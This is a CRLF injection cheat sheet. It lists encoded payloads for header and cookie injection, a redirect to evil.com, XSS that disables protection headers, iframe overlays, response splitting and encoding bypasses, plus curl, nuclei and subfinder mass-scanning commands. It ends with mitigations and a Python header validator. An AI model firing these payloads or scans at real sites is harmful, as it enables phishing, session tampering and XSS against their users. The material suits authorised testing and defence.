CRLF Injection
Carriage Return and Line Feed injection. Manipulate HTTP headers and responses.
Phase 1: Introduction

1. CRLF is the pair of control characters that marks the end of a line in HTTP headers
   CRLF = Carriage Return (%0d) + Line Feed (%0a)
2. Basic CRLF injection test payload
   %0d%0aX-Injection-Test: injected
3. Why CRLF injection is dangerous
   Can lead to HTTP response splitting, web cache poisoning, and XSS attacks

Phase 2: Basic Header Injection

1. Inject a custom header (simplest form of CRLF injection)
   %0d%0aX-Injection-Test: injected
2. Inject a Set-Cookie header
   %0d%0aSet-Cookie: hacked=true;
3. Inject HTML content after the CRLF sequence
   %0d%0a%3Ch1%3EHTML INJECTION%3C/h1%3E%0d%0a%3Cp%3ECRLF Injection PoC%3C/p%3E

Phase 3: Redirect/Phishing

1. Redirect users to an attacker-controlled site via an injected Location header
   %0d%0aLocation: https://evil.com
2. Phishing link injection
   %0d%0a%0d%0a%3Ca%20href=%22https://example.com/%22%3ELogin Here%20%3C/a%3E
3. Combined redirect with Content-Type
   %0d%0aLocation: http://evil.com%0d%0aContent-Type: text/html

Phase 4: XSS Injection via CRLF

1. Basic XSS payload after CRLF
   %0d%0a%0d%0a<script>alert('XSS via CRLF')</script>
2. Disable XSS protection and inject a script
   %0d%0aContent-Type: text/html%0d%0aX-XSS-Protection: 0%0d%0a%0d%0a<script>alert(document.cookie)</script>
3. SVG-based XSS payload
   %0d%0a%0d%0a%3Csvg onload=alert(1)%3E
4. Bypass XSS protection with prompt()
   %0d%0aX-XSS-Protection: 0%0d%0a%0d%0a%3Cimg src=x onerror=prompt(1)%3E

Phase 5: IFrame Injection

1. Inject a full-page iframe (pointing at nasa.gov as a harmless example)
   %0d%0a%0d%0a%3Ciframe src=%22https://www.nasa.gov/%22 style=%22border:0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%%22%3E

Phase 6: HTTP Response Splitting

1. HTTP response splitting: terminate the real response and append a fake one
   /vulnerable-endpoint?q=abc%0d%0aContent-Length: 0%0d%0a%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a<script>alert('Split!')</script>
2. Test with curl: inject a Set-Cookie header
   curl -I "https://example.com/%0d%0aSet-Cookie:crlf=injected;"

Phase 7: Bypass Techniques

1. GBK encoding bypass payload (plain form)
   /%0d%0aSet-Cookie:whoami=coffinxp
2. GBK-encoded CRLF bypass
   https://example.com/%E5%98%8D%E5%98%8ASet-Cookie:coffin=hi
3. Double CRLF for body injection
   %0d%0a%0d%0a<script>alert(1);</script>
4. Full chain: CRLF → XSS with protection bypass
   %0d%0aContent-Type: text/html%0d%0aX-XSS-Protection: 0%0d%0a%0d%0a<script>alert('XSS');</script>

Phase 8: Testing with cURL

1. Test a single URL with curl -I (headers only)
   curl -I "https://example.com/%0d%0aSet-Cookie:crlf=injected;"
2. Test with a query parameter
   curl -I "https://example.com/page=home%0d%0aSet-Cookie:crlf=injected;"
3. Scan with the Nuclei CRLF template
   nuclei -u https://target.com -t crlf.yaml
4. Mass-scan subdomains for CRLF vulnerabilities
   subfinder -d domain.com -all | nuclei -t crlf.yaml

Phase 9: Mass Scanning with Loxs

1. Step 1: Capture the request with Burp Suite
   Intercept the request in Burp (e.g., GET /?page=home)
2. Step 2: Inject CRLF in Repeater
   Send to Repeater and modify: page%0d%0aSet-Cookie:crlf=injected
3. Step 3: Check whether the injection succeeded
   Observe the response for new headers such as Set-Cookie: crlf=injected
4. Loxs tool for mass CRLF scanning
   https://github.com/coffinxp/loxs

Phase 10: Nuclei Templates

1. Basic Nuclei CRLF scan
   nuclei -u https://target.com -t crlf.yaml
2. Reference: CoffinXP CRLF Nuclei template
   https://github.com/coffinxp/nuclei-templates/blob/main/crlf.yaml
3. Scan a list of targets and save the results
   cat targets.txt | nuclei -t crlf.yaml -o crlf-results.txt

Phase 11: Mitigation

1. Remove CR and LF characters from any user input reflected in headers
   Sanitize and Validate Input: Strip \r and \n from user input
2. Use well-tested libraries for HTTP header handling
   Use Safe Functions: Avoid manual header construction
3. Properly encode user data before placing it in HTTP headers
   Output Encoding: Encode special characters in headers
4. Reference: HackTricks CRLF Injection guide
   https://hacktricks.wiki/en/pentesting-web/crlf-0d-0a.html
5. Reference: PortSwigger Response Queue Poisoning
   https://portswigger.net/web-security/request-smuggling/response-queue-poisoning
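The mitigation phase above describes the defence in three words (strip, use safe functions, encode). The following is an added example, not code from the original cheat sheet or from any of the tools it links, showing what a header validator actually has to check. It assumes a small application-side helper that is called before any user-controlled value reaches a response header; the function names (is_safe_header_value, strip_crlf, build_header_block, check_payloads) and the payload list are constructed for this example. The validator allows only the RFC 7230 field-value alphabet (tab, space, visible ASCII) rather than just deleting \r and \n, so the unicode-encoded line breaks from the bypass phase are rejected as well once the framework has URL-decoded the value.

```python
import re
from urllib.parse import unquote

# Header name: RFC 7230 token characters only.
_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
# Header value: horizontal tab, space and visible ASCII only. Rejecting
# everything else (not only CR and LF) also defeats multi-byte encodings
# that a lenient server might later fold down to a 0x0d / 0x0a byte.
_FIELD_VALUE = re.compile(r"^[\t\x20-\x7e]*$")


class HeaderInjectionError(ValueError):
    """Raised when a caller tries to emit a header that could split the response."""


def is_safe_header_value(value: str) -> bool:
    """True if the value contains no line break or other control/non-ASCII byte."""
    return bool(_FIELD_VALUE.match(value))


def strip_crlf(value: str) -> str:
    """The 'strip \\r and \\n' mitigation from the page, for legacy code paths.
    Rejecting (below) is preferable because it surfaces the attempt in logs
    instead of silently repairing it."""
    return value.replace("\r", "").replace("\n", "")


def build_header_block(headers) -> bytes:
    """Serialise (name, value) pairs into a header block, refusing any pair
    that would inject an extra line. Mirrors what a safe framework API does."""
    lines = []
    for name, value in headers:
        if not _TOKEN.match(name):
            raise HeaderInjectionError(f"invalid header name: {name!r}")
        if not is_safe_header_value(value):
            raise HeaderInjectionError(f"line break or control byte in {name}: {value!r}")
        lines.append(f"{name}: {value}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


# Constructed inputs: a benign value plus payload shapes from the cheat sheet.
SAMPLE_PAYLOADS = [
    "home",
    "%0d%0aSet-Cookie:crlf=injected;",
    "%0d%0a%0d%0a%3Csvg onload=alert(1)%3E",
    "%E5%98%8D%E5%98%8ASet-Cookie:coffin=hi",  # unicode CR/LF bypass form
]


def check_payloads(payloads=SAMPLE_PAYLOADS) -> dict:
    """URL-decode each payload (as a web framework does before the value
    reaches application code) and report whether the validator accepts it."""
    return {p: is_safe_header_value(unquote(p)) for p in payloads}


if __name__ == "__main__":
    for payload, accepted in check_payloads().items():
        print(f"{'ACCEPT' if accepted else 'REJECT'}  {payload}")
    print(build_header_block([("Location", "/home"), ("X-Frame-Options", "DENY")]))
```

Only the benign value survives the check; the two percent-encoded CRLF payloads and the unicode variant are all rejected after decoding, and attempting to serialise a rejected value raises rather than emitting a second header line. Run the check on the values a handler actually writes into Location, Set-Cookie or custom headers, and log each rejection as a detection signal.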